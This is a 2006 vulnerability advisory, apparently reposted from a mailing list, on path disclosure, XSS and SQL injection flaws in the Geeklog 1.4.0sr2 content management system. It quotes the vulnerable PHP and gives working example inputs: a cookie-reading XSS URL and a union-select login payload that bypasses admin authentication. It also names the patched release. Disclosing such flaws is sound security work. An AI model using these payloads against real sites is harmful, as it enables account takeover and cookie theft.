[KAPDA::#45] - geeklog multiple vulnerabilities

2006-05-3000:00:00

vulners.com

JSON

KAPDA New advisory

Vendor: http://www.geeklog.net
Bugs: Path Disclosure, XSS, SQL Injection
(Authentication bypass)

Vulnerable Version: geeklog-1.4.0sr2(prior versions
also may be affected)
Exploitation: Remote with browser

Description:

geeklog is a freely available PHP-based web content
management system that uses a MySQL database.
Vulnerabilities:

–>>Path Disclosure<<–
Reason: direct access to special files that generates
php error with installation path information.
Several files are vulnerable in this case.
Example:
http://example.com/geeklog/layout/professional/functions.php
http://example.com/geeklog/getimage.php?mode=show&image=dd

–>>XSS<<–
Reason: the script doesn't properly validate user
supplied input in getimage.php that result in xss
vulnerability

Example:
http://example.com/geeklog/getimage.php?mode=show&image=./<IMG%20SRC=JaVaScRiPt:alert(document.cookie)>

Code Snippets:
/getimage.php line#100-103

$display = COM_errorLog('File, ' .
$downloader->getPath() . $image . ', was not found in
getimage.php');

if &#40;$mode == &#39;show&#39;&#41; {
    echo COM_siteHeader &#40;&#39;menu&#39;&#41; . $display .

COM_siteFooter ();

–>>SQL Injection (Authentication bypass)<<–
Reason: again the script doesn't properly validate
user supplied input in /admin/auth.inc.php that may
result in Authentication bypass using sql injection to
gain admin privileges.

Code Snippets:
/admin/auth.inc.php line#44-45

if (!empty ($_POST['loginname']) && !empty
($_POST['passwd'])) {
$status = SEC_authenticate ($_POST['loginname'],
$_POST['passwd'], $uid);

…/system/lib-security.php line#697-732

function SEC_authenticate($username, $password, &$uid)
{
global $_TABLES, $LANG01, $_CONF;

$result = DB_query&#40; &quot;SELECT status, passwd, email,

uid FROM {$_TABLES['users']} WHERE
username='$username' AND ((remoteservice is null) or
(remoteservice = ''))" );
$tmp = mysql_errno();
$nrows = DB_numRows( $result );

if&#40;&#40; $tmp == 0 &#41; &amp;&amp; &#40; $nrows == 1 &#41;&#41;
{
    $U = DB_fetchArray&#40; $result &#41;;
    $uid = $U[&#39;uid&#39;];
    if &#40;$U[&#39;status&#39;] == USER_ACCOUNT_DISABLED&#41;
    {
        return USER_ACCOUNT_DISABLED; // banned,

jump to here to save an md5 calc.
} elseif ($U['passwd'] != md5( $password )) {
return -1; // failed login
} elseif ($U['status'] ==
USER_ACCOUNT_AWAITING_APPROVAL) {
//awaiting approval, jump to msg.
echo COM_refresh($_CONF['site_url'] .
'/users.php?msg=70');
exit;
} elseif ($U['status'] ==
USER_ACCOUNT_AWAITING_ACTIVATION) {
// Awaiting user activation, activate:

DB_change($_TABLES['users'],'status',USER_ACCOUNT_ACTIVE,'username',$username);
return USER_ACCOUNT_ACTIVE;
} else {
return $U['status']; // just return their
status
}
}
else
{
$tmp = $LANG01[32] . ": '" . $username . "'";
COM_errorLog( $tmp, 1 );
return -1;
}
}

as you see there is no input validation here so when
magic_quotes_gpc=off you can bypass login
Authentication.

Example:
/admin/moderation.php POST data:
loginname:
me' union select
3,'3d2172418ce305c7d16d4b05597c6a59','email',2 from
gl_users where username='Admin
passwd:
22222

Solution:

Version geeklog-1.4.0sr3 is available now.
http://www.geeklog.net/article.php/geeklog-1.4.0sr3

Original Advisory:

http://kapda.ir/advisory-336.html

Credit:

Discovered & released by trueend5 (trueend5 kapda ir)
Security Science Researchers Institute Of Iran
[http://www.KAPDA.ir]

Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com